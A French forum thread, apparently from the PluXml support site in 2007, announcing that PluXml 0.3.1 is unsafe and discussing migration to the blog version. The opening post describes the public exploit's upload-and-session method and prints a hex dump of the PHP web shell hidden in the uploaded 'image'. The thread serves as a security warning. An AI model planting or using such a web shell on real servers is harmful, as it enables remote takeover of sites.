Sécurité : merci de ne plus utiliser Pluxml 0.3.1 (version classique)

DitiDiti Member
dans Annonces officielles
Pluxml 0.3.1 Remote Code Execution Exploit


Il est possible depuis le 24 juin 2007, date de mise à disposition de l'exploit par un certain DarkFig, d'accéder en tant qu'administrateur sur un Pluxml 0.3.1 à l'aide d'un script PHP-CLI basé sur un procédé d'ingénierie sociale (social engineering) et la récupération de l'identifiant de session PHP (PHPSESSID).

Le script va créer ce qu'on appelle un socket, permettant de se connecter à un site distant depuis le script et va créer une boucle infinie jusqu'à ce qu'accès à l'administration soit autorisé. Il se base sur une faille du système d'envoi d'images, aucune vérification sur le type MIME n'étant faite. L'image est en fait constituée d'un code hexadécimal permettant d'accéder au shell du serveur : 
000000A0 007F 3C3F 7068 700D 0A69 6628 6973 7365 ..<?php..if(isse
000000B0 7428 245F 5345 5256 4552 5B48 5454 505F t($_SERVER[HTTP_
000000C0 5348 454C 4C5D 2929 0D0A 7B0D 0A70 7269 SHELL]))..{..pri
000000D0 6E74 2031 3233 3435 3637 3839 3130 3131 nt 1234567891011
000000E0 3132 3B0D 0A65 7661 6C28 245F 5345 5256 12;..eval($_SERV
000000F0 4552 5B48 5454 505F 5348 454C 4C5D 293B ER[HTTP_SHELL]);
00000100 0D0A 7072 696E 7420 3132 3334 3536 3738 ..print 12345678
00000110 3931 3031 3131 323B 0D0A 7D0D 0A3F 3EFF 9101112;..}..?\>.
J'ai reçu le lien vers le script complètement par hasard d'un contact Jabber, qui m'a dit avoir vu un lien d'un membre du site du zéro. J'aimerais lui dire merci :) .
Je tiens à remercier également le créateur de ce script (ce dernier étant en fin de compte pas mal répandu sur internet) d'avoir trouvé une faille potentielle, comme quoi on peut apprendre de ses erreurs.

Je rappelle à toute la communauté que Pluxml blog est plus récent et qu'une simple désactivation des commentaires le sépare de la version classique. En conséquence de quoi, le développement de Pluxml étant arrêté au profit d'une prochaine version à paraitre (peu importe quand), cette version ne sera plus maintenue, ainsi que son support technique.

Vous avez la possibilité de faire migrer vos articles grâce à un script non officiel. Voyez ce message pour plus d'informations.

Le lien de téléchargement a été enlevé de la page principale, vous pouvez cependant toujours le télécharger depuis la page réservée aux anciennes versions (à des fins de test uniquement).

PS : Ceci est une réelle source de sécurité sur certains serveurs, en accédant au shell on peut facilement télécharger le code source d'un script, le compiler et s'en servir pour avoir le contrôle du serveur.

Réponses

  • davdavdavdavdavdav Member
    septembre 2007 modifié
    salut,

    je compte du coup migrer vers la version blog de pluxml mais, est ce que le fait de supprimer la page index.php du dossier admin empêchera d'accéder au serveur via ce script?

    ça parait logique mais bon je n y connais trop rien :)

    et merci pour l'info
  • DitiDiti Member
    Cela ne règlera pas le problème car le script s'appuie sur la page auth.php, celle dont tu te sers pour te connecter.
    Si tu veux éviter de migrer, la seule solution assez sécurisée serait d'enlever l'accès à l'administration et à publier tous les articles à la main...

    Pas top :) !
  • fightsoulfightsoul Member
    septembre 2007 modifié
    Je tiens à signaler que j'ai crée un p'tit bout de code php qui permet de mettre à jour les articles de la version pluxml 0.3.1 (classique donc...) vers la version blog beta 3.
    Il me semble que le code est d'ailleurs disponible sur le forum en faisant une recherche ;).

    PS : voici le code en question ici (notez à bien exécuter le code à la racine de votre pluxml).
  • davdavdavdavdavdav Member
    ok, le problème c'est que j'ai modifié pluxml donc en attendant, je préfère mettre le dossier admin à la poubelle ;).
  • DitiDiti Member
    fightsoul a écrit:
    Je tiens à signaler que j'ai crée un p'tit bout de code php qui permet de mettre à jour les articles de la version pluxml 0.3.1 (classique donc...) vers la version blog beta 3.
    Ajouté à l'annonce ;) .
  • AlbaAlba Member
    Diti a écrit:
    Si tu veux éviter de migrer, la seule solution assez sécurisé serait d'enlever l'accès à l'administration et à publier tous les articles à la main...
    Et en donnant un nom impossible à un dossier d'administration ? Genre "admin-cd47bt". J'ai entendu dire que des hackers/pirates/ truc muches pouvaients lister un répertoire ?
  • DitiDiti Member
    Ça peut également fonctionner, mais cette solution ne présente un intérêt que si ce répertoire est connu de toi seul. Pas d'apparition en lien, sinon les moteurs de recherche le savent.
  • El-CherubinEl-Cherubin Member
    merde... moi qui me casse la tete a adapter mes templates dessus depuis ce matin... :(

    Bon, bah je recommence avec la version blog.
  • DitiDiti Member
    Hum, je crois que cette annonce serait plus voyante si elle était épinglée. Voilà qui est fait.
  • Julien-AGDJulien-AGD Member
    Bonjour, que deviens le coté CMS de Pluxml, car c'était le coté qui me donnais le plus envie de m'intéréssé a ce projet, une date pour une version sécurisé est-elle prévu ? en espérant que oui, ce serais dommage de voir un si bo projet ne restaer qu'au statut de blog et de faire disparaitre l'option CMS

    ++
    julien
  • eolhyteeolhyte Member
    Eh bien en fait, l'aspect CMS se pérennisera dans la version blog, en désactivant les commentaires, et la version normale disparait, parce que Skyline ne peut supporter deux versions.
    Désactive les commentaires dans Pluxml-blog et tu auras pluxml normal, avec le support en plus, promis :)
  • Julien-AGDJulien-AGD Member
    Bonsoir,

    Merci eolhyte, je vais tester ca de suite

    ++
    julien
Connectez-vous ou Inscrivez-vous pour répondre.